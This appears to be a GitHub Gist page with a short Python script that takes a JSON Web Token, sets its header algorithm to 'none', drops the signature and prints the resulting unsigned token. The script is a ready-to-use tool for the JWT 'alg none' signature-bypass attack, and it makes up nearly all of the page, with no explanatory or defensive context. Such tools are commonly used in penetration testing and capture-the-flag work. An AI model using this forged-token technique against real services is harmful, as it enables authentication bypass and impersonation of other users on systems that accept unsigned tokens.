Last active
April 16, 2021 01:48
-
-
Save sophieKaelin/92e9bfd3809e98b95c312ec1a53915ee to your computer and use it in GitHub Desktop.
Python Script that inputs a JWT and outputs that JWT with "None" signing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import base64, json, binascii | |
| # Decode the token and extract the header if correct format | |
| jwt = input("Please enter your JWT Token: ") | |
| try: | |
| jwtVals = jwt.split(".") | |
| payload = jwtVals[1] | |
| header = (base64.b64decode(jwtVals[0]+'=')).decode("utf-8") | |
| except (IndexError, binascii.Error) as err: | |
| print("\n\n*** Incorrect token format, please enter a valid JWT Token ***\n\n") | |
| exit() | |
| # Convert to JSON format and update alg field | |
| header = json.loads(header) | |
| header['alg'] = 'none' | |
| # Convert from JSON back to Base64 | |
| header = json.dumps(header) | |
| header = (base64.b64encode(header.encode("utf-8"))).decode("utf-8").replace('=', '') | |
| # Return updated JWT (with removed signature) | |
| jwt = header + '.' + payload + '.' | |
| print("\nYour 'none' signed token is: \n") | |
| print(jwt+'\n') |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment